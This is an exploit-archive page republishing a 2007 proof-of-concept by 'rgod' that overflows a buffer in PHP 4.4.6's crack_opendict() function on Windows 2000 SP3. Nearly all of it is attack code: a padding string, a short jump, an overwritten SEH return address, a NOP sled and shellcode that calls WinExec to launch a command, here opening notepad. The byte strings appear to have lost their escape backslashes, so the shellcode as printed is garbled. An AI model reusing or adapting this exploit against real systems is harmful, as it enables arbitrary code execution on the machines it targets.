PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC
# Published : 2007-03-08
# Author : rgod
# Previous Title : PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC
# Next Title : PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 zip:// URL Wrapper BoF Exploit

<?php
//PHP 4.4.6 crack_opendict() local buffer overflow poc exploit
//win2k sp3 version / seh overwrite method
//to be launched from the cli

// by rgod
// site: http://retrogod.altervista.org

if (!extension_loaded("crack")){
die("you need the crack extension loaded.");
}

$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbxcax73xe9x77". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbx5cxcfxe9x77". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

$jmp="xebx06x06xeb"; // jmp short
$eip="x86xa0xf8x77"; // call ebx, ntdll.dll
$____suntzu.=str_repeat("A",3216);
$____suntzu.=$jmp.$eip.str_repeat("x90",12).$____scode;
crack_opendict($____suntzu);

?>

# www.Syue.com [2007-03-08]